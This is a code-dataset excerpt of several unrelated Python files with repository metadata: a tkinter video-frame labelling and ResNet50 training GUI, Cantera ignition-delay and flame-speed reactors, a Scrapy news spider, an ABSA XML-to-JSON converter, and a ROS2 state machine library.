with open(selected_directory + '/train/frames.csv', 'w', encoding='UTF8', newline='') as f:
writer = csv.writer(f)
writer.writerow(header)
writer.writerows(data2)
print("Done! Please label frames accordingly in 'frames.csv' ")
# Close the progress bar window
progress.stop()
progress_window.destroy()
# Show a new popup window that says "frame split complete"
complete_window = tk.Toplevel(root)
complete_window.title("Complete")
complete_label = ttk.Label(complete_window, text="Frame splitting complete. \nYour training frames are located in /train/frames/ in your selected directory. \nPlease update your excel file located in the /train/ folder with the necessary labels")
complete_label.pack(padx=10, pady=(10, 0))
ok_button = ttk.Button(complete_window, text="OK", command=complete_window.destroy)
ok_button.pack(padx=10, pady=(5, 10))
# Update the main window
root.update()
def begin_training():
# Create a progress bar popup window
progress_window = tk.Toplevel(root)
progress_window.title("Splitting Videos")
progress_label = ttk.Label(progress_window, text="Training model...")
progress_label.pack(padx=10, pady=(10, 0))
progress = ttk.Progressbar(progress_window, mode="indeterminate", length=300)
progress.pack(padx=10, pady=(5, 10))
progress.start(10)
progress_window.update()
#load training excel file
data = pd.read_csv(selected_directory + '/train/frames.csv')
#count number of areas created in excel file:
cnt = 0
visited = []
for i in range (0, len(data['Class'])):
if data['Class'][i] not in visited:
visited.append(data['Class'][i])
cnt+=1
X = [ ] # creating an empty array
for img_name in data.Image_ID:
img = plt.imread(selected_directory + '/train/frames/' + img_name)
X.append(img) # storing each image in array X
X = np.array(X)
y = data.Class
dummy_y = np_utils.to_categorical(y)
image = []
for i in range(0,X.shape[0]):
a = resize(X[i], preserve_range=True, output_shape=(224,224)).astype(int) # reshaping to 224*224*3
image.append(a)
X = np.array(image)
X = preprocess_input(X, mode='caffe')
X_train, X_valid, y_train, y_valid = train_test_split(X, dummy_y, test_size=0.3, random_state=42)
base_model = ResNet50(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
X_train = base_model.predict(X_train)
X_valid = base_model.predict(X_valid)
X_train.shape, X_valid.shape
X_train = X_train.reshape(X_train.shape[0], 7*7*2048) # converting to 1-D
X_valid = X_valid.reshape(X_valid.shape[0], 7*7*2048)
train = X_train/X_train.max() # centering the data
X_valid = X_valid/X_train.max()
model = Sequential()
model.add(InputLayer((7*7*2048,))) # input layer
model.add(Dense(units=2048, activation='sigmoid')) # hidden layer
model.add(Dropout(0.5)) # adding dropout
model.add(Dense(units=1024, activation='sigmoid')) # hidden layer
model.add(Dropout(0.5)) # adding dropout
model.add(Dense(units=512, activation='sigmoid')) # hidden layer
model.add(Dropout(0.5)) # adding dropout
model.add(Dense(units=256, activation='sigmoid')) # hidden layer
model.add(Dropout(0.5)) # adding dropout
model.add(Dense(cnt, activation='softmax')) # output layer
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(train, y_train, epochs=15, validation_data=(X_valid, y_valid))
model.save(selected_directory + '/train/model')
# Close the progress bar window
progress.stop()
progress_window.destroy()
# Show a new popup window that says "model training complete"
complete_window = tk.Toplevel(root)
complete_window.title("Complete")
complete_label = ttk.Label(complete_window, text="Model training complete. Model has been saved to /train/model/.\nYou may begin classification of new videos in the classify tab")
complete_label.pack(padx=10, pady=(10, 0))
ok_button = ttk.Button(complete_window, text="OK", command=complete_window.destroy)
ok_button.pack(padx=10, pady=(5, 10))
# Update the main window
root.update()
# Add description text above the browse button
description_label = ttk.Label(tab_train, text="Select user video folder:")
description_label.pack(padx=10, pady=(10, 0))
# Create a frame to hold the directory entry and browse button
entry_browse_frame = ttk.Frame(tab_train)
entry_browse_frame.pack(padx=10, pady=(5, 10))
# Add an empty text box for manual directory input
directory_entry = ttk.Entry(entry_browse_frame, width=50)
directory_entry.pack(side="left")
# Add a browse button to the "Train Model" tab
browse_button = ttk.Button(entry_browse_frame, text="Browse", command=browse_directory)
browse_button.pack(side="left", padx=(10, 0))
# Create a text box to show a list of video files in the chosen directory
video_files = tk.Text(tab_train, wrap="none", width=50, height=10, state="normal")
video_files.pack(padx=10, pady=(5, 10))
# Add split text description above the split button
split_description_label = ttk.Label(tab_train, text="Split videos into frames and output to a train folder:")
split_description_label.pack(padx=10, pady=(10, 0))
# Add a split button to the "Train Model" tab
split_button = ttk.Button(tab_train, text="Split", command=frame_split)
split_button.pack(padx=10, pady=(5, 10))
#Add train text description above train button
train_description_label = ttk.Label(tab_train, text="Begin training model (please make sure your excel file is properly filled out)")
train_description_label.pack(padx=10, pady=(10, 0))
# Add a train button to the "Train Model" tab
train_button = ttk.Button(tab_train, text="Train", command=begin_training)
train_button.pack(padx=10, pady=(5, 10))
| NoahSCode/EDUSIM | app_train.py | app_train.py | py | 10,305 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tkinter.filedialog.askdirectory",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "tkinter.END",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "t... |
35056080810 | import cantera as ct
import numpy as np
from typing import List, Tuple
from scipy import integrate
from copy import copy
"""
Present a simple implementation of IDT reactors and the
cantera implementation of a LFS reactor.
Each model can be called as:
IDT, all_conditions = idt_reactor.solve(gas, flag='T', temp_rise=400)
IDT, all_conditions = idt_reactor.solve(gas, path_to_save=dir_to_save, phi_for_file_name=phi_value)
WARNINGS: idt_reactor uses only the Temperarure rise. The species peak is still under developement.
LFS, all_conditions = lfs_reactor.solve(gas)
LFS, all_conditions = lfs_reactor.solve(gas, path_to_save=dir_to_save, phi_for_file_name=phi_value)
The saved file will be named as:
<model_type>_<TEMP in K>_<PRESSURE in atm>_<PHI, default is 1.0>.csv
The first line will contain the propertie value (IDT or LFS).
The second line will be a header containing specifics and the conditions.
The rest of the file will present the values in a csv format.
"""
# --------------------------------------------------------------------------------------------------
# utils for save
def save_solution_to_file(file_path: str,
model_type: str,
model_value: float,
header: str,
states: np.ndarray,) -> None:
"""
Save the conditions to a csv file.
The fist line presents the model propertie, folowed by the header and the data.
MODEL_<model specific>=<model value>
MODEL_IDT_T_400 -> IDT model, with T flag as 400 K
MODEL_LFS -> LFS model
"""
data_to_save = f"MODEL_{model_type}={model_value}\n{header}\n"
data_to_save += "\n".join([",".join([str(states[row, col]) for col in range(states.shape[1])]) for row in range(states.shape[0])])
with open(file_path, 'w') as f:
f.write(data_to_save)
def create_solution_file_name(model_type: str, temp: float, press: float, phi: float) -> str:
"""
Creates the file name considering the initial state.
<model_type>_<temp>_<press>_<phi>.csv
temp -> Kelvin
press -> Pa
if no phi is provided, use 1.0 as default.
"""
f_name = f"{model_type}_{temp:.1f}_{press/ct.one_atm:.2f}_"
if phi:
f_name += f"{phi:.1f}"
else:
f_name += "1.0"
f_name += ".csv"
return f_name
# --------------------------------------------------------------------------------------------------
# IDT implementation
class ConstantMassPressureODE:
"""Implement the 0D, constant mass, constant pressure reactor"""
def __init__(self, gas: ct.Solution) -> None:
self.gas: ct.Solution = gas
self._pressure: float = gas.P
def __call__(self, t: float, y: np.ndarray) -> np.ndarray:
"""return the set of EDO. See Turns to understand."""
# Set the gas conditions
if y[0] <= 0:
raise ValueError(f"Negative value found for temperature.")
self.gas.set_unnormalized_mass_fractions(y[1:])
self.gas.TP = y[0], self._pressure
# calculates all the values
rho = self.gas.density
wdot = self.gas.net_production_rates
dTdt = - (np.dot(self.gas.partial_molar_enthalpies, wdot) / (rho * self.gas.cp))
dYdt = wdot * self.gas.molecular_weights / rho
return np.hstack((dTdt, dYdt))
class IDTReactor:
"""
Class implementation of an 0D reactor to obtain the IDT value.
"""
def __init__(self, rtol: float = 10**-6, atol: float = 10**-9, n_iter: int = 10000) -> None:
self.rtol = rtol
self.atol = atol
self.n_iter = n_iter
def _get_solver(self, gas: ct.Solution, inital_condition: np.ndarray) -> integrate.ode:
"""
Set the solver to run the IDT cases.
"""
ODE = ConstantMassPressureODE(gas)
solver = integrate.ode(ODE)
solver.set_integrator('lsoda', method='bdf', rtol=self.rtol, atol=self.atol, with_jacobian=False, nsteps=self.n_iter)
solver.set_initial_value(inital_condition, 0.0)
return solver
def _get_header(self, gas: ct.Solution) -> str:
return "time(s),T,P," + ",".join(["X_" + spc.name for spc in gas.species()])
def get_idt(self, gas: ct.Solution,
max_time: float = 5.0,
dt: float = 10**-7,
flag: str = 'T',
temp_rise: float = 400.0) -> float:
"""
Find the idt time.
This returns a float. If an error is raised by solver problems, it returns a -1.0,
if no IDT is found in the time window, returns -2.0.
"""
# TODO: Add the species flag. For a peak, run up to the max time.
# Prepare the initial conditions
initial_condition = np.array([gas.T, *gas.Y])
temperature_flag = temp_rise + initial_condition[0]
# Set the solver
solver = self._get_solver(gas, initial_condition)
# solve
try:
while solver.successful() and solver.t <= max_time:
if solver.y[0] >= temperature_flag:
return solver.t
solver.integrate(solver.t + dt)
# catch any temperature problem
except:
return -1.0
# if we do not find a IDT in the max_time
return -2.0
def get_norm_states(self, gas: ct.Solution, idt: float,
norm_dt: float = 0.01,
max_norm_time: float = 2.0) -> Tuple[np.ndarray, str]:
"""
Solve the idt reactor at every norm dt and return the real time conditions.
Returns a np.ndarray containing the values and a str containig the header:
time(s), T, P, Y_<spc names>
"""
initial_condition = np.array([gas.T, *gas.Y])
const_pressure = copy(gas.P)
n_points = int(max_norm_time / norm_dt + 1)
out_solution = np.zeros([n_points, 3 + gas.n_species])
out_solution[0, 1], out_solution[0, 2] = gas.T, gas.P
out_solution[0, 3:] = gas.X
# Set the solver
solver = self._get_solver(gas, initial_condition)
# set control parameters
dt = norm_dt * idt
max_time = max_norm_time * idt
cur_point = 0
try:
while solver.successful():
cur_point += 1
solver.integrate(solver.t + dt)
# for the output to be in molar fraction
gas.TPY = solver.y[0], const_pressure, solver.y[1:]
out_solution[cur_point, 0] = solver.t
out_solution[cur_point, 1] = gas.T
out_solution[cur_point, 2] = gas.P
out_solution[cur_point, 3:] = gas.X
if cur_point == n_points - 1:
break
return out_solution, self._get_header(gas)
except:
raise Exception("Failed to solve the ODE. Try a different set of tolerances.")
def solve(self, gas: ct.Solution,
path_to_save: str = "",
phi_for_file_name: float = None,
norm_dt: float = 0.01,
max_norm_time: float = 2.0,
max_time_for_idt: float = 5.0,
dt_for_idt: float = 10**-7,
idt_flag: str = 'T',
idt_temp_rise: float = 400.0) -> Tuple[float, np.ndarray, str]:
"""
Solve the reactor, returning a IDT value, a np.ndarray with all conditions and the corresponding header.
If a directory is passed as input, save the conditions to the file.
The condition in the gas solution passed to this method is consdered the initial condition.
"""
init_TPY = copy(gas.TPY)
idt = self.get_idt(gas, max_time=max_time_for_idt, dt=dt_for_idt, flag=idt_flag, temp_rise=idt_temp_rise)
if idt <= 0.0:
if idt == -2.0:
raise Exception(f"It was not possble to obtain IDT. No IDT found in the time window.")
raise Exception(f"It was not possble to obtain IDT. Solver problems found.")
gas.TPY = init_TPY
states, header = self.get_norm_states(gas, idt, norm_dt=norm_dt, max_norm_time=max_norm_time)
# check for save flag:
if path_to_save != "":
f_name = create_solution_file_name("IDT", init_TPY[0], init_TPY[1], phi_for_file_name)
save_solution_to_file(path_to_save + f_name, f"IDT_{idt_flag}_{idt_temp_rise:.2f}", idt, header, states)
return idt, states, header
# --------------------------------------------------------------------------------------------------
# LFS implementation
class LFSReactor:
"""
Class implementation of an 1D reactor to obtain the LFS value.
"""
def __init__(self, width: float = 0.014,
ratio: float=3,
slope: float=0.1,
curve: float=0.1,
max_time_step_count: int = 5000,
loglevel: int = 0) -> None:
self.width = width
self.ratio = ratio
self.slope = slope
self.curve = curve
self.max_time_step_count = max_time_step_count
self.loglevel = loglevel
def _get_header(self, gas: ct.Solution) -> str:
return "grid(s),T,P," + ",".join(["X_" + spc.name for spc in gas.species()])
def _get_states(self, flame: ct.FreeFlame) -> np.ndarray:
"""
Return the states of the current flame.
grid(m), T, P, X_<species>
"""
out_data = np.zeros([len(flame.T),len(flame.X) + 3])
out_data[:,0] = flame.grid
out_data[:,1] = flame.T
out_data[:,2] = flame.P
for i in range(len(flame.X)):
out_data[:,3 + i] = flame.X[i]
return out_data
def solve(self, gas: ct.Solution,
path_to_save: str = "",
phi_for_file_name: float = None) -> Tuple[float, np.ndarray, str]:
"""
Solve the reactor, returning a IDT value, a np.ndarray with all conditions and the corresponding header.
If a directory is passed as input, save the conditions to the file.
The condition in the gas solution passed to this method is consdered the initial condition.
"""
init_TPY = copy(gas.TPY)
# Create the flame object
flame = ct.FreeFlame(gas, width=self.width)
# flame.transport_model = 'Mix'
# Define tolerances for the solver
flame.set_refine_criteria(ratio=self.ratio, slope=self.slope, curve=self.curve)
flame.max_time_step_count = self.max_time_step_count
# Define logging level
flame.solve(loglevel=self.loglevel, auto=True)
Su0 = flame.velocity[0]
states = self._get_states(flame)
header = self._get_header(gas)
# check for save flag:
if path_to_save != "":
f_name = create_solution_file_name("LFS", init_TPY[0], init_TPY[1], phi_for_file_name)
save_solution_to_file(path_to_save + f_name, f"LFS_m_s", Su0, header, states)
return Su0, states, header
| fingeraugusto/red_app | src/reactors.py | reactors.py | py | 11,199 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.ndarray",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "cantera.one_atm",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "cantera.Solution",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "cantera... |
18206090350 | from scrapy.selector import HtmlXPathSelector
from scrapy.contrib.spiders import CrawlSpider # Rule
from scrapy.http.request import Request
import html2text
import time
import re
import dateutil.parser
import datetime
import urlparse
from buzz_crawler.items import BuzzCrawlerItem
from markdown import markdown
class WozSpider(CrawlSpider):
name = 'woz'
allowed_domains = ['www.woz.ch']
start_urls = ['http://www.woz.ch/']
def handle_blog(self, response):
hxs = HtmlXPathSelector(response)
item = BuzzCrawlerItem()
item['url'] = response.url
item['date'] = datetime.datetime.now()
item['title'] = hxs.xpath(".//*[@id='container']/div/div/article/header/h1/text()").extract()[0].strip()
item['blurb'] = hxs.xpath(".//*[@id='container']/div/div/article/header/h2/text()").extract()[0].strip()
unprocessed_content = hxs.xpath("//div[@class='article-content']").extract()[0].strip()
h = html2text.HTML2Text()
h.ignore_links = True
h.ignore_images = True
processed_content = h.handle(unprocessed_content)
item['content'] = markdown(processed_content)
item['source'] = 'woz.ch'
yield item
def parse(self, response):
hxs = HtmlXPathSelector(response)
posts = hxs.xpath(".//*[@id='container']/div/div/article")
for post in posts:
post_link = post.xpath("a/@href").extract()[0]
post_absolute_url = urlparse.urljoin(response.url, post_link.strip())
yield Request(post_absolute_url, self.handle_blog)
| claudehenchoz/z4 | buzz_crawler/buzz_crawler/spiders/woz_spider.py | woz_spider.py | py | 1,600 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrapy.contrib.spiders.CrawlSpider",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "scrapy.selector.HtmlXPathSelector",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "buzz_crawler.items.BuzzCrawlerItem",
"line_number": 21,
"usage_type"... |
13859467294 | import xml.etree.ElementTree as ET
import json
path_train = "D:/code/prompt-ABSA/dataset/original data/ABSA16_Laptops_Train_SB1_v2.xml"
path_test = 'D:/code/prompt-ABSA/dataset/original data/EN_LAPT_SB1_TEST_.xml'
terr = 'laptops16'
def get_path(territory, data_type):
return f'./dataset/data/{territory}/{data_type}.json'
def judge(p):
for i in range(len(p)):
for j in range(i + 1, len(p)):
if p[j]['category'] == p[i]['category'] and p[j]['polarity'] != p[i]['polarity']:
return False
return True
def extract_data(path):
tree = ET.parse(path)
root = tree.getroot()
data = []
# 从xml文件中提取数据
for review in root:
for sentences in review:
for sentence in sentences:
piece = []
for t in sentence.iter('text'):
piece.append(t.text)
for o in sentence.iter('Opinion'):
d = {'category': o.attrib['category'], 'polarity': o.attrib['polarity']}
piece.append(d)
# 所有沒有category分類的句子以及所有一個category卻多個情感的句子
if len(piece) > 1 and judge(piece[1:]):
data.append(piece)
n_category = 0
category = []
# 进行数据统计
for e in data:
for i in range(1, len(e)):
c, s = e[i].values()
if c not in category:
n_category += 1
category.append(c)
all_data = [n_category, category, data]
return all_data
train_data = extract_data(path_train)
test_data = extract_data(path_test)
# 将train中没有而test中有的category從test中刪除
over_list = [elem for elem in test_data[1] if elem not in train_data[1]]
move_list = [elem for cate in over_list for elem in test_data[2] for e in elem[1:] if e['category'] == cate]
test_data[2] = [elem for elem in test_data[2] if elem not in move_list]
test_data[1] = [elem for elem in test_data[1] if elem not in over_list]
test_data[0] = len(test_data[1])
print(over_list)
with open(get_path(terr, 'train'), 'w', encoding='utf-8') as f:
json.dump(train_data, f)
with open(get_path(terr, 'test'), 'w', encoding='utf-8') as f:
json.dump(test_data, f)
| lazy-cat2233/PBJM | data_from_xml.py | data_from_xml.py | py | 2,285 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "xml.etree.ElementTree.parse",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "xml.etree.ElementTree",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "json.dump",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "json.dump... |
31515158551 | """Basic state machine implementation."""
# pylint: disable=unnecessary-pass, too-many-instance-attributes
from typing import Iterable, Union
from rclpy import logging
from rclpy.node import Node
from rclpy.time import Time, Duration
LOGGER = logging.get_logger("behavior")
class Resource:
"""The resource class is used to track access to shared resources.
When a state starts, it attempts to acquire all the resources it needs.
Resources are automatically freed when the state stops. By default,
multiple states can access the same resource, but a UniqueResource will
throw an error if a state tries to acquire a resource that is already owned
by another state.
The registry is a class variable that is used to keep track of all the
resources and their owners.
"""
_registry = {}
def __init__(self, name: str):
self._name = name
if name in Resource._registry:
LOGGER.error(f"Resource {name} already exists. "
"Different resources must have unique names.")
Resource._registry[name] = set()
def __del__(self):
Resource._registry.pop(self._name)
def get_name(self) -> str:
"""Get the name of the resource"""
return self._name
def get_owner(self):
"""Get the owner of the resource"""
return Resource._registry[self._name]
def is_free(self) -> bool:
"""Check if the resource is free"""
return len(Resource._registry[self._name]) == 0
def assign(self, owner: 'State') -> 'Resource':
"""Assign the resource to an owner."""
if owner in Resource._registry[self._name]:
LOGGER.error(f"Resource {self._name} already owned by {owner}.")
Resource._registry[self._name].add(owner)
return self
def transfer(self, old_owner: 'State', new_owner: 'State') -> 'Resource':
"""Transfer ownership of the resource"""
if old_owner not in Resource._registry[self._name]:
LOGGER.error(f"Resource {self._name} not owned by {old_owner}.")
Resource._registry[self._name].remove(old_owner)
Resource._registry[self._name].add(new_owner)
return self
def free(self, owner: 'State'):
"""Free the resource"""
Resource._registry[self._name].remove(owner)
@staticmethod
def validate(*resources: str):
"""Check if a set of resource names is valid"""
for resource in resources:
if resource not in Resource._registry:
LOGGER.error(f"Resource {resource} does not exist. Invalid name.")
class UniqueResource(Resource):
"""A resource that can only be owned by one state at a time"""
def assign(self, owner: 'State') -> Resource:
"""Assign the resource to an owner."""
if not self.is_free():
LOGGER.error(f"Resource {self._name} already owned by "
f"{Resource._registry[self._name]}.")
Resource._registry[self._name].add(owner)
return self
class State:
"""Superclass for states"""
def __init__(self, name,
node:Node = None,
resources:Iterable[str] = None,
parent:'StateMachine' = None):
self._base_name = name
self._name = name
self._node = None
self._running = False
self._start_time = None
self._required_resources = set() if resources is None else set(resources)
self._parent = None
self._resources = {}
if node is not None:
self._node = node
if parent is not None:
self.set_parent(parent)
def set_node(self, node:Node):
"""Set the node for the state"""
self._node = node
def set_parent(self, parent:'StateMachine'):
"""Set the parent state machine"""
if self._parent is not None:
LOGGER.error(f"State {self._name} already has parent.")
if self._running:
LOGGER.error(f"State {self._name} already running. "
"Cannot change parent.")
self._parent = parent
self._name = f"{parent.get_name()}/{self._base_name}"
def get_base_name(self):
"""Get the base name of the state"""
return self._base_name
def get_name(self):
"""Get the name of the state"""
return self._name
def get_required_resources(self) -> Iterable[str]:
"""Get the set of required resources"""
return self._required_resources
def add_required_resource(self, resource: Union[str, Iterable[str]]):
"""Add a required resource"""
if self._running:
LOGGER.error(f"State {self._name} already running. "
"Cannot add required resources.")
if isinstance(resource, str):
self._required_resources.add(resource)
else:
for res in resource:
self._required_resources.add(res)
if self._parent is not None:
self._parent.add_required_resource(resource)
def get_start_time(self) -> Time:
"""Get the time the state started"""
return self._start_time
def get_current_time(self) -> Time:
"""Get the current time"""
return self._node.get_clock().now()
def get_elapsed_time(self) -> Duration:
"""Get the time the state has been running"""
return self._node.get_clock().now() - self._start_time
def get_node(self) -> Node:
"""Get the node for the state"""
return self._node
def start(self):
"""Start the state"""
if self._node is None:
LOGGER.error(f"State {self._name} must be run within a ros2 node. "
"Use set_node() to set the node.")
if self._running:
LOGGER.warning(f"State {self._name} already running")
for resource in self._required_resources:
self._acquire_resource(resource)
self._running = True
self._start_time = self._node.get_clock().now()
def stop(self):
"""Stop the state"""
if not self._running:
LOGGER.warning(f"State {self._name} not running")
return
self._release_all_resources()
self._running = False
def step(self):
"""Do one step of the state"""
if not self._running:
LOGGER.error(f"State {self._name} has not been started. Cannot step.")
def get_resource(self, resource: str) -> Resource:
"""Get a resource reference"""
return self._resources[resource]
def _acquire_resource(self, resource_name: str):
"""Acquire a resource"""
if resource_name in self._resources:
LOGGER.warning(f"Resource {resource_name} already acquired")
resource = self._parent.get_resource(resource_name)
if isinstance(resource, UniqueResource):
self._resources[resource_name] = resource.transfer(self._parent, self)
else:
self._resources[resource_name] = resource.assign(self)
def _release_resource(self, resource_name: str):
"""Release a resource back to parent"""
if resource_name not in self._resources:
LOGGER.error(f"Resource {resource_name} not in resource list for "
f"{self.get_name()}.")
resource = self._resources[resource_name]
if isinstance(resource, UniqueResource):
resource.transfer(self, self._parent)
else:
resource.free(self)
self._resources[resource].transfer(self, self._parent)
self._resources.pop(resource)
def _release_all_resources(self):
"""Release all resources"""
for resource in self._resources.values():
if isinstance(resource, UniqueResource):
resource.transfer(self, self._parent)
else:
resource.free(self)
self._resources.clear()
def validate(self):
"""Validate the state"""
if self._parent is None:
# Only need to validate resource names at global level
Resource.validate(*self._required_resources)
class Event:
"""An event that signals a transtition between states"""
def __init__(self, name):
self._name = name
self._status = False
self._enabled = False
self._state = None
self._required_resources = set()
self.initialized = True # Some events might need additional info before
# being initialized such as subscriber events
def get_name(self) -> str:
"""Get the name of the event"""
return self._name
def reset(self):
"""Reset the event"""
self._status = False
def get_status(self) -> bool:
"""Get the status of the event without updating"""
return self._status
def update(self) -> bool:
"""Update the event and get status"""
return self._status
def add_required_resource(self, resource: Union[str, Iterable[str]]):
"""Add a required resource"""
if isinstance(resource, str):
self._required_resources.add(resource)
else:
for res in resource:
self._required_resources.add(res)
def get_required_resources(self) -> Iterable[str]:
"""Get the set of required resources"""
return self._required_resources
def enable(self, state:State):
"""Called when corresponding state is started"""
if self._state is not None:
LOGGER.error(f"Event {self._name} already enabled for state "
f"{self._state.get_name()}")
self._state = state
self._enabled = True
def is_enabled(self) -> bool:
"""Check if event is enabled"""
return self._enabled
def disable(self):
"""Called when corresponding state is stopped"""
self.reset()
self._state = None
self._enabled = False
def __invert__(self) -> 'Event':
if isinstance(self, NotEvent):
return self._e1
return NotEvent(self)
def __and__(self, other:'Event') -> 'Event':
return AndEvent(self, other)
def __or__(self, other:'Event') -> 'Event':
return OrEvent(self, other)
class CompositeEvent(Event):
"""An event that is a combination of other events."""
def __init__(self, name):
super().__init__(name)
self._events = set()
def get_base_events(self) -> Iterable[Event]:
"""Returns the base (non-composite) events"""
return self._events
def add_event(self, event:'Event'):
"""Add an event to the set"""
if isinstance(event, self.__class__):
self._events |= event.get_base_events()
self._events.add(event)
self._required_resources |= event.get_required_resources()
def reset(self):
for event in self._events:
event.reset()
self._status = False
def update(self) -> bool:
for event in self._events:
event.update()
return self._status
def enable(self, state:State):
super().enable(state)
for event in self._events:
if not event.is_enabled():
event.enable(state)
class NotEvent(CompositeEvent):
"""An event that is true if its base event is false"""
def __init__(self, event, name=None):
super().__init__(f"not_{event.get_name()}" if name is None else name)
self.add_event(event)
self._e1 = event
def update(self) -> bool:
if not self._e1.initialized:
return False
self._status = not self._e1.update()
return self._status
class AndEvent(CompositeEvent):
"""An event that is true if both of two events is true"""
def __init__(self, event1, event2, name=None):
super().__init__(f"{event1.get_name()}_and_{event2.get_name()}"
if name is None else name)
self.add_event(event1)
self.add_event(event2)
self._e1 = event1
self._e2 = event2
def update(self) -> bool:
super().update()
self._status = self._e1.get_status() and self._e2.get_status()
return self._status
class OrEvent(CompositeEvent):
"""An event that is true if at least one of two events is true"""
def __init__(self, event1, event2, name=None):
super().__init__(f"{event1.get_name()}_or_{event2.get_name()}"
if name is None else name)
self.add_event(event1)
self.add_event(event2)
self._e1 = event1
self._e2 = event2
def update(self) -> bool:
super().update()
self._status = self._e1.get_status() or self._e2.get_status()
return self._status
class StateMachine(State):
"""A basic state machine"""
def __init__(self, name, node:Node = None):
super().__init__(name, node=node)
self._states = {} # type: Dict[str,State]
self._events = {} # type: Dict[str,Event]
self._transitions = {} # type: Dict[str,Dict[str,str]] # from -> event -> to
self._current_state = None
self._start_state = None
def set_node(self, node:Node):
super().set_node(node)
for state in self._states.values():
state.set_node(node)
def add_state(self, state:State):
"""Add a state to the state machine"""
if state.get_base_name() in self._states:
LOGGER.warning(f"State {state.get_base_name()} already in state "
"machine. Skipping.")
return
state.set_node(self._node)
state.set_parent(self)
self._states[state.get_base_name()] = state
self._required_resources |= state.get_required_resources()
# By default, the start state is the first state added
if self._start_state is None:
self._start_state = state.get_base_name()
def add_transition(self,
from_state:Union[str,State],
event:Event,
to_state:Union[str,State]):
"""Add a transition to the state machine"""
if isinstance(from_state, State):
from_state = from_state.get_base_name()
if isinstance(to_state, State):
to_state = to_state.get_base_name()
if from_state not in self._states:
LOGGER.error(f"State {from_state} not in state machine. Invalid transition.")
if to_state not in self._states:
LOGGER.error(f"State {to_state} not in state machine. Invalid transition.")
if from_state not in self._events:
self._events[from_state] = {}
elif event in self._events[from_state]:
LOGGER.warning(f"Transition from {from_state} on event {event} already exists. "
"Overwriting.")
self._events[event.get_name()] = event
if from_state not in self._transitions:
self._transitions[from_state] = {}
self._transitions[from_state][event.get_name()] = to_state
self._states[from_state].add_required_resource(event.get_required_resources())
def set_start(self, state:Union[str,State]):
"""Set the start state"""
if isinstance(state, State):
state = state.get_base_name()
if state not in self._states:
LOGGER.error(f"State {state} not in state machine. Invalid start state.")
self._start_state = state
def _transition(self, state:Union[str,State]):
"""Transition to a new state"""
if isinstance(state, State):
state = state.get_base_name()
if state not in self._states:
LOGGER.error(f"State {state} not in state machine. Invalid transition.")
if self._current_state is not None:
for event in self.get_all_base_events():
event.disable()
self._current_state.stop()
self._current_state = self._states[state]
self._current_state.start()
if self._current_state.get_base_name() in self._transitions:
for event_name in self._transitions[self._current_state.get_base_name()]:
event = self._events[event_name]
event.enable(self._current_state)
LOGGER.debug(f"Transitioned to state {state}")
print (f"======Transitioned to state {state}======")
def get_all_base_events(self, state=None) -> Iterable[Event]:
"""Recursively gets a set of all base events for a state"""
if state is None:
state = self._current_state
events = set()
if state.get_base_name() not in self._transitions:
return events
for event_name in self._transitions[state.get_base_name()]:
event = self._events[event_name]
if isinstance(event, CompositeEvent):
events |= self._events[event_name].get_base_events()
events.add(event)
return events
def start(self):
"""Start the state machine"""
super().start()
if self._start_state is None:
return
self._transition(self._start_state)
LOGGER.debug(f"Started state machine {self._name}")
def stop(self):
"""Stop the state machine"""
if self._current_state is not None:
for event in self.get_all_base_events():
event.disable()
self._current_state.stop()
super().stop()
LOGGER.debug(f"Stopped state machine {self._name}")
def step(self):
"""Do one step of the state machine"""
if self._current_state is None:
return
if self._current_state.get_base_name() in self._transitions:
for event_name, to_state in self._transitions[
self._current_state.get_base_name()].items():
if self._events[event_name].update():
self._node.get_logger().info(
f"{event_name}: {self._current_state.get_base_name()} -> {to_state}")
self._transition(to_state)
break
self._current_state.step()
def _check_reachability(self, start_state:str, reachable:set):
"""Recursively check reachability of states"""
if start_state in reachable:
return
reachable.add(start_state)
if start_state not in self._transitions:
return
for to_state in self._transitions[start_state].values():
self._check_reachability(to_state, reachable)
def validate(self):
"""Validates State machine consturction to check for errors at initialization"""
super().validate()
if self._start_state is None:
return
# Recursively validate child state machines
for state in self._states.values():
state.validate()
# Check reachability
reachable = set()
self._check_reachability(self._start_state, reachable)
unreachable = set(self._states.keys()) - reachable
if len(unreachable) > 0:
LOGGER.warning(f"State machine {self._name} has unreachable states: {unreachable}")
# Check resource sharing
for state in self._states.values():
missing_resources = state.get_required_resources() - self._required_resources
if len(missing_resources) > 0:
LOGGER.error(f"State {state.get_name()} requires resources {missing_resources} "
f"that are not provided by state machine {self._name}")
for state, events in self._transitions.items():
for event in events:
missing_resources = (self._events[event].get_required_resources() -
self._states[state].get_required_resources())
if len(missing_resources) > 0:
LOGGER.error(f"Event {event} requires resources {missing_resources} "
f"that are not provided by state {state.get_name()}")
class StateMachineRoot(StateMachine):
"""A State Machine with no parent"""
def __init__(self, node:Node):
super().__init__("/", node)
def new_resource(self, resource:Resource):
"""Add a new resource to the state machine"""
self.add_required_resource(resource.get_name())
self._resources[resource.get_name()] = resource.assign(self)
def set_parent(self, parent):
LOGGER.error("Cannot set parent of root state machine")
def _acquire_resource(self, resource_name):
pass
def _release_resource(self, resource_name):
pass
def _release_all_resources(self):
pass
class ParallelState(State):
"""A state that runs multiple states in parallel"""
def __init__(self, name, node:Node = None, states:Iterable[State] = None):
super().__init__(name, node)
self._states = []
if states is not None:
for state in states:
self.add_state(state)
def add_state(self, state):
"""Add a state to the parallel state"""
self._states.append(state)
state.set_node(self._node)
state.set_parent(self._resources)
self._required_resources |= state.get_required_resources()
if self._running:
state.start()
def start(self):
"""Start the parallel state"""
super().start()
for state in self._states:
state.start()
def stop(self):
"""Stop the parallel state"""
